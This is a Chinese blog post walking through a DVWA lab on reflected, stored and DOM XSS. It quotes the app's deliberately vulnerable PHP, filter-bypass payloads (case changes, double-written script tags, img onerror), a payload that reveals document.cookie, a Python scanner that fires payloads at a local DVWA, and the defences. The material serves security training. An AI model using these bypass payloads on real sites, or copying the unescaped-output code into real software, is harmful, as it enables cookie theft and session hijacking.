【DVWA】-反射型/存储型XSS

最新推荐文章于 2023-06-12 15:23:19 发布
最新推荐文章于 2023-06-12 15:23:19 发布
阅读量482 收藏 1
点赞数 1
分类专栏: Dvwa 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dive668/article/details/115091529
版权

【Python】 DVWA

介绍

XSS,全称 cross Site scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页而中注入恶意的脚本代码。当受害者访问该页而时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限子 Javascript,还括flash等其它脚本语言。根据恶意代码是否存在服务器中,XSS可以分为存储型的XSS与反射型的XSS.

DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经下用 document.boby.innerHtml等函数动态生成html页面,如果这些函数在引用某些变量时没有进行过滤或检查,就会产生DOM型的XSS。DOM型XSS可能是存储型,也有可能是反射型。

反射型

攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
最多的是在搜索里面。
</titile>闭合标签,之后加上xss代码。修复方法strip_tags
payload直接被url,从后端输入到前端页面上。
在这里插入图片描述

  • Low
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

<script>alert()</script>

  • Medium
    使用了字符串替换,将<script>替换为空。str_replace( '<script>', ''
    可以双写绕过,或大小写绕过(因为str_replace大小写不敏感)。
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

<Script>alert()</Script>
<scr<script>ipt>alert(1)</script>

  • High
    采用正则表达,过滤了所有的大小写s,c,r,i,p,t。
    需要借助其他标签进行XSS的探测利用。
    img标签,指定一个不存在的资源。
    <img src='1' onerror=alert(/xss/)>
    这个不存在的图片地址为http://localhost/DVWA/vulnerabilities/xss_r/1
    在这里插入图片描述

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>
  • Impossible
    先check token
    然后使用htmlspecialchars函数把预定义的字符&,",’,<,>转换为HTML实体,防止浏览器将其作为HTML元素。
    在这里插入图片描述
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

反射XSS防御
1.过滤用户输入
2.使用 htmlspecialchars()过滤
3.使用 owasp等安全xss处理API

存储型XSS

存储型XSS是保存到数据库当中,具有持久性的效果。

  • Low
    没有过滤机制。

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	//通过query的insert存储到数据库中,再次访问时就能获得内容。
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>
  • Medium
    message使用了htmlspecialchars,无法绕过,name可以通过重写,大小写绕过。前端如果限制了输入空间大小,可以自己修改。
    在这里插入图片描述显示
    在这里插入图片描述
 $message = htmlspecialchars( $message );
 $name = str_replace( '<script>', '', $name );
  • High
    此处High和反射性XSS一样,通过<img src='1' onerror="alert()"/>

Dom XSS

是通过document.write将文本信息写入到数据库中。
遇到str_resplace对<script>的过滤,采用img代替。记得先闭合option和select。
</option>< /select><img src="1" onerror="alert(123)”/>
High级别:
使用了白名单过滤。可以正常提交一个French。把脚本代码注释起来。#<script>alert(/xss/)</script>。完整payloadFrench # <script>alert(/xss/)</script>

Python

XSS是发生在客户端的漏洞,当用户提交一个XSS payload时,服务器接收到相关请求。如果处理不严谨,那么提交的XSS payload就会在浏览器当中进行显示。并且输出内容,如果payload是个js,也即javascript代码,那么这个代码就会被执行了。
python XSS检测代码:
如需使用,只需修改自己主机上Dvwa的url和headers内的referer。

import requests
import urllib
import re
import time
import threading
from bs4 import BeautifulSoup
import io
#通过argc,argv获得url
def get_cookie_token(url_start):
	headers={'Host':'127.0.0.1',
			'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
			'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
			'Connection':'keep-alive',
			'Upgrade-Insecure-Requests':'1'}
	res=requests.get(url_start,headers=headers)
	cookies=res.cookies
	print(type(cookies))
	html=res.text
	soup=BeautifulSoup(html,"html.parser")
	s=soup.find('input',type='hidden').get('value')
	#token=soup.form.contents[3]['value']
	cook=cookies.items()
	cook[1]=('security','low')
	a=[(';'.join(['='.join(item)for item in cook]))]
	a.append(s)
	#s=re.findall('<input type=\'hidden\'name=\'user_token\' value=\'(.*?)\'',html)
	return a;

def Sign_in(url_start):
	headers={
	'Referer':'http://localhost/DVWA/login.php',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
	'Connection':'keep-alive',
	'Content-Length':'88',
	'Content-Type':'application/x-www-form-urlencoded',
	'Upgrade-Insecure-Requests':'1',
	'Cookie':a[0]}
	values={
		'username':'admin',
		'password':'password',
		'Login':'Login',
		'user_token':a[1]
	}
	datas=urllib.urlencode(values)
	response=requests.post(url_start,data=datas,headers=headers)

if __name__ == '__main__':
	url="http://localhost/DVWA/login.php"
	a=get_cookie_token(url)
	Sign_in(url)
	headers={'Host':'127.0.0.1',
	         'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
	         'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	         'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
	         'Connection':'keep-alive',
	         'Upgrade-Insecure-Requests':'1',
	         'Cookie':a[0],
	         'Referer':'http://localhost/DVWA/vulnerabilities/xss_r/'
	         }
	url="http://localhost/DVWA/vulnerabilities/xss_r/"
	with io.open('xss_payloads.txt','r',encoding='utf-8') as f:
		payload_list=f.readlines()
		for payload in payload_list:
			payload=payload.strip()
			params={'name':payload,
					'user_token':a[1]
			}
			#拓展
			#post提交的存在xss
			#cookie提交的存在xss
			res=requests.get(url,params=params,headers=headers)
			#在返回界面中找不到嵌入的payload则说明没有xss漏洞
			if res.text.find(payload)!=-1:
				print('[+]xss found:{}+{}'.format(url,payload))
				#保存url及其对应的payload
			else:
				print('[-]no xss')

在这里插入图片描述

I春期课程

代码高亮说明被解析。
<img scr='x' onerror=alert(document.cookie)>打出cookie值。

TIGER1693
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Framework 反射文件下载漏洞(CVE-2020-5421)复现
锋刃科技的博客
12-30 4277
漏洞概述 Spring是一个Java/Java EE/.NET的分层应用程序框架。 Spring Framework 存在反射文件下载漏洞 。 此漏洞由于Spring Framework并没有对filename传入的文件名进行严格的安全检测,攻击者可以通过截断的方式控制filename变量值,下载任意格式的文件。 影响版本 Spring Framework 5.2.0 – 5.2.2 Spring Framework 5.1.0 – 5.1.12 Spring Framework ..
DVWA-反射XSS漏洞
Drink_J的博客
03-20 561
(一)将DVWA的级别设置为low 1.1 查看源代码,没有对参数做任何过滤,直接输出 1.2尝试一般的XSS攻击 ①输入 window.location用于获得当前页面的URL,并把浏览器重定向到新的页面 iframe作用是文档中的文档,将原页面变为一个长和宽为0的网页 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200320172629582.pn...
渗透测试-xss的三种类讲解
lza20001103的博客
08-07 4055
渗透测试-xss的三种类讲解
VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中
罗彬桦的博客
08-25 570
漏洞描述: VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,公布了一个存在于Spring Framework中的反射文件下载(Reflected File Download,RFD)漏洞CVE-2020-5421。 CVE-2020-5421 可通过jsessionid路径参数,绕过防御RFD攻击的保护。先前针对RFD的防护是为应对 CVE-2015-5
dvwa学习笔记——反射xss
weixin_45082914的博客
07-27 1261
一、XSS的形成原理 xss中文名“跨站脚本攻击”, xss也是一种注入攻击,当web应用对用户输入过滤不严格,攻击者写入恶意的脚本代码(HTML、JavaScript)到网页中,如果用户访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击信息泄露。 常见危害:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等 二、XSS的分类 1、反射xss 反射xss一般出现在URL参数中及网站搜索栏中,由于需要点击包含恶意代码的URL才可以触发,并且只能触发一次,所以也被
DVWA-XSS (Reflected)-反射XSS
seanyang_的博客
06-12 3053
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA-master.zip
01-04
DVWA中的XSS练习涵盖了反射存储两种类,让你了解如何防范这种攻击,比如使用输入验证、转义特殊字符以及设置HTTP-only cookie等。 4. **命令注入** 在DVWA中,命令注入漏洞允许攻击者执行服务器上的任意...
DVWA-master安装包
02-28
2. **跨站脚本(XSS)**:分为反射存储两种,XSS允许攻击者通过注入可执行的JavaScript代码来窃取用户cookie或其他敏感信息。 3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或...
DVWA-master.rar
03-15
2. **跨站脚本(XSS)**: "XSS"挑战展示了反射XSS存储XSS的实例,教育用户如何防止恶意脚本注入到页面中。 3. **文件包含**: "文件包含"漏洞让攻击者能够控制服务器加载的文件,可能导致敏感信息泄露或执行任意...
DVWAXSS(Reflected)反射XSS
RexHa的博客
10-07 2087
dvwa 反射XSS
XSS注入(1)-两个简单测试理解反射xss注入和存储xss注入
妙蛙种子吃了都会妙妙秒的妙脆角的博客
02-28 6963
XSS注入(1)-两个例子理解反射xss注入和存储xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。 xss的分类主要有:反射XSS存储XSS、DOMXSS。有时也会将DOM归于反射XSS中,所以我们经常将xss分为反射XSS存储XSS两大类。 一
(25)【XSS跨站合集】反射存储、DOM类XSS原理;输出在HTML、CSS、Javascript代码中
03-24 4073
XSS跨站合集】反射存储、DOM类XSS
储存性XSS。。
qq_45300786的博客
08-18 486
第一种情况:本身代码是单引号闭合,但是经过浏览器渲染后看起来就是双引号闭合 我们在打XSS的时候,会发现浏览器里的源码是双引号,但实际上开发写的是单引号,经过浏览器渲染之后就把单引号,渲染成双引号了,所以她实质上是单引号。所以我们打XSS的时候也要用单引号。 储存性XSS并不一定要存进数据库,只要能存进去,然后再调用出出来,只要满足这个条件,就算存入txt文件都可以。 一个存储XSS 上面我们可以看到插入XSS代码成功, 那么我们现在就来靶场获取flag一下。 先去XSS平台创建一个任务。
存储XSS反射XSS漏洞
竹墨的专栏
12-07 5842
存储XSS漏洞 存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 反射XSS 反射XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面
存储跨站脚本攻击
一个程序员的修炼之路
08-10 1万+
XSS跨站脚本攻击(Cross Site Script, XSS),是最常见的Web应用应用程序安全漏洞之一,也是OWASP 2013 Top 10之一。 XSS通常来说就是在网页中嵌入恶意代码, 通常来说是Javascript,当用户访问网页的时候,恶意脚本在浏览器上执行。存储XSSXSS主要分为三种类: 反射XSS存储XSS和DOMXSS。本文主要阐述的是存储XSS,简单来说明一下
反射XSS存储XSS和DOMXSS的简介及XSS常见payload构造及变形
bwxzdjn的博客
03-21 5096
用实验案例的形式记录学习三大常见的跨站脚本攻击:反射XSS存储XSS和DOMXSS,借此来掌握XSS攻击的基础知识。还有几种payload的构造以及变形来绕过一些简单的过滤。
反射存储XSS漏洞利用
a_helloworlds的博客
04-09 2772
反射XSS利用过程 1. 恶意的攻击者发给受害者一个链接(链接中携带xss代码) 2. 攻击者诱使受害者点开这个链接 3. XSS代码被提交到有XSS漏洞的Web应用程序上 4. WEB应用程序没有过滤提交上来的数据,或者过滤不严格。 5. WEB应用程序输出用户提交上来的数据(包含XSS代码)。 6. 用户浏览器渲染返回的HTML页面...
反射XSS漏洞的条件+类+危害+解决
热门推荐
wuhuagu_wuhuaguo的博客
03-31 4万+
XSS攻击需要具备两个条件:需要向web页面注入恶意代码;这些恶意代码能够被浏览器成功的执行。 XSS攻击有2种:   反射攻击;    存储攻击 XSS反射攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 XSS存储攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,
XSS详解(概念+靶场演示)反射存储的比较与详细操作
Hala
05-04 1万+
目录 XSS(跨站脚本攻击) 1.XSS简介 1.1什么是XSS? 1.2 XSS攻击的危害包括: 2. 分类 2.1反射 2.2存储 3. 构造XSS脚本 3.1常用HTML标签 3.2常用javascript方法 4.反射(四种安全级别演示) 4.4.1低安全级别 4.4.2 中安全级别 4.4.2 高安全级别 4.4.2 不可能安全级别 5.存储(四种...
dvwa xss反射
最新发布
08-29
对于DVWA(Damn Vulnerable Web Application)的XSS反射攻击,它是一种常见的Web应用程序安全漏洞。在XSS(跨站脚本攻击)反射攻击中,恶意用户通过构造特定的URL参数或表单输入,注入恶意脚本代码到应用程序的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值